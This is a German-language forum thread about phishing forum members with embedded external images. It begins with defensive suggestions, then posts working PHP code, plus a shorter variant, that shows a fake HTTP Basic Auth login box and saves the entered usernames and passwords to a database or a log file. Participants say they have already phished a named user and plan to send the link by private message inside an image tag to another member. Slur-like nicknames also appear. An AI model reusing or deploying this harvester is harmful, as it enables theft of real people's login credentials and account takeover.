Vielleicht sollten wir nun auch schreiben, wie man sich und das Forum davor schützen kann
Das geht wohl nur, wenn das Einbinden von Ressourcen unmöglich gemacht wird, die sonstwo im Web liegen.
Unser Thema phishing - in Bezug auf die Politikarena.
-
-
Wäre das Ganze nicht eine eigene Konversation wert, denn hier sprengte es den Rahmen des Themas.
-
Hab das mal hier hin verschoben.
-
Wer will mich da verarschen, habe gerade so eine Anmeldebox erhalten.
Ich war aber gar nicht auf der PA Seite.
:mehr als suspekt:Nachtrag:
Wenn man hier auf Seite 2 geht.
Mach was Alf! -
Das geht wohl nur, wenn das Einbinden von Ressourcen unmöglich gemacht wird, die sonstwo im Web liegen.Wuffi, du hast falsch zitiert.
Ich hab das nicht geschrieben. -
Alles anzeigen
Wer will mich da verarschen, habe gerade so eine Anmeldebox erhalten.
Ich war aber gar nicht auf der PA Seite.
:mehr als suspekt:Nachtrag:
Wenn man hier auf Seite 2 geht.
Mach was Alf!Das war nur eine Demo was passiert, wenn man einen bestimmten Verweis als Bild einfügt.
Habe es wieder gelöscht. -
Wie soll das gehen?
Na ja, er war Admin im DF und hatte seine Vertrauensstellung missbraucht.Inwiefern?
Das geht wohl nur, wenn das Einbinden von Ressourcen unmöglich gemacht wird, die sonstwo im Web liegen.Selbst kann man nicht viel machen. Folgender Tipp für User. In der PA schalte ich den Editor auf Quelltext Mode. Somit sehe ich beim Antworten oder Zitieren zumindestens, wenn jemand externe Bilder einbaut. Und man erkennt, woher diese Bilder kommen. Wenn mir die URL "spanisch" vorkommt, lösche ich das Bild beim Zitieren. Toller Nebeneffekt. Man lernt einiges über die Nutzer. Der Doc z.B. baut gerne Smilies aus einem anderen Forum ein. Und zwar aus einem Seglerforum. Da scheint sich also jemand für's Segeln zu interessieren. Narrthan hat übrigens dasselbe Hobby, wie er mal schrieb! Welch ein Zufall
Was den serverseitigen Schutz betrifft, sehe ich nur 2 Möglichkeiten.
Entweder eine Blacklist mit erlaubten Image-Quellen(Bildhoster, Soziale Netzwerke und Medienseiten)
Oder aber man erweitert das Forum insofern, dass jedes Bild vor der Ausgabe auf den Statuscode gecheckt wird.(404, 401 usw). Das liesse sich sicherlich mit ein paar Zeilen Code realisieren. Allerdings bräuchte man da einen eigenen Server, wegen der zusätzlichen Last. -
Inwiefern?
Indem er seine admin Anmeldeinformationen an unbefugte weiter gab, die darauf hin vertrauliche Informationen des Forums dazu nutzten,
den Betreiber zu erpressen und zu diskreditieren. -
Meines Wissens ist er sogar Administrator.
-
Hier: http://politikarena.uphero.com/login.php
ZitatAlles anzeigen
<?php
$mysql_host = ----;
$mysql_database = ----;
$mysql_user = ----;
$mysql_password = ----;
/*
Important: MySQL Host for any database in this account is mysql16.000webhost.com , do not use localhost!
*/header('WWW-Authenticate: Basic realm="politikpla.net"');
header('HTTP/1.0 401 Unauthorized');
echo 'hi</p>';$link = mysql_connect($mysql_host, $mysql_user, $mysql_password);
if (!$link)
{
die ('Could not connect: ' . mysql_error());
}
if (!mysql_select_db($mysql_database, $link))
{
die ('Could not connect: ' . mysql_error());
}
echo 'Connected successfully</p>';$sql = "INSERT INTO collection (user,pass) VALUES ('"
.$_SERVER['PHP_AUTH_USER']
."','"
.$_SERVER['PHP_AUTH_PW']
."');";$result = mysql_query ($sql);
echo 'result is: '.$result.'</p>';
echo $sql.'</p>';
echo "err ".mysql_error().'</p>';
mysql_close ($link);?>
... speichert die Login-Daten in einer MySQL-Tabelle.
Die ersten mit dem $ beginnenden Zeilen werden durch die Login-Daten der lokalen DB ersetzt.
Den User "Tschak" aus politikpla.net habe ich schonmal gephisht: http://crazydog.prophpbb.com/post2698.html#p2698
-
Verbesserungsvorschlag: Es geht auch mit 5 Zeilen ohne eigene Datenbank
Zitatheader('WWW-Authenticate: Basic realm="politikpla.net"');
header('HTTP/1.0 401 Unauthorized');
$handle = fopen("user.log", "a");
fwrite($handle,$_SERVER['PHP_AUTH_USER'] . ': ' . $_SERVER['PHP_AUTH_PW'].'\n' );
fclose($handle);@Admin. Ist der Strang öffentlich?
Hier: http://politikarena.uphero.com/login.php
... speichert die Login-Daten in einer MySQL-Tabelle.
Die ersten mit dem $ beginnenden Zeilen werden durch die Login-Daten der lokalen DB ersetzt.
Den User "Tschak" aus politikpla.net habe ich schonmal gephisht: http://crazydog.prophpbb.com/post2698.html#p2698 -
Verbesserungsvorschlag: Es geht auch mit 5 Zeilen ohne eigene Datenbank
Sehr schön!
Meine Variante ist Copy&Paste, aus Code-Samples aus dem PHP-Manual zusammengestückelt. -
Sehr schön!
Meine Variante ist Copy&Paste, aus Code-Samples aus dem PHP-Manual zusammengestückelt.Hast Du nix zu tun?
-
Hast Du nix zu tun?
Wollte nur mal wissen, wie weit man mit Mitteln kommt, die jedem im Netz zur Verfügung stehen. Hätte vorher nicht gedacht, dass man mit PHP HTTP Header manipulieren kann. PHP muss ja für Skript-Kiddys die reinste Offenbarung sein. -
-
Meines Wissens ist er sogar Administrator.
Du meinst doch Bombenleger-Vollhorst? -
Ja, Jewrassig.
-
Der Freak ist zurück. Und dabei war es schon fast angenehm in der Arena die letzten Wochen
Aber dass du die Landung unseres Kugelfliegers in diesem Thread erwähnst, brachte mich auf die Idee, ihm das hier: http://politikarena.uphero.com/login.php verpackt in einem IMG-Tag per PN zu schicken. Mal sehen ob er anbeißt.
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!